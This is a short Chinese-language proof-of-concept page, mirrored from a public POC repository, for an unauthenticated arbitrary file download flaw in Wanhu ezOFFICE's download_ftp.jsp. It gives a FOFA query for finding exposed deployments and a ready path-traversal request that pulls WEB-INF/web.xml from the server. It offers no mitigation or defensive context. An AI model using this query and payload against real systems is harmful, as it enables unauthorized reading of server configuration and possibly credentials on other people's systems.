mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 05:54:14 +00:00
17 lines
504 B
Markdown
17 lines
504 B
Markdown
![]() |
## 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞
|
||
|
|
||
|
万户OA-ezOFFICE download_ftp.jsp 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
|
||
|
|
||
|
## fofa
|
||
|
|
||
|
```
|
||
|
app="万户网络-ezOFFICE"
|
||
|
```
|
||
|
|
||
|
## poc
|
||
|
|
||
|
```
|
||
|
/defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
|
||
|
```
|
||
|
|
||
|

|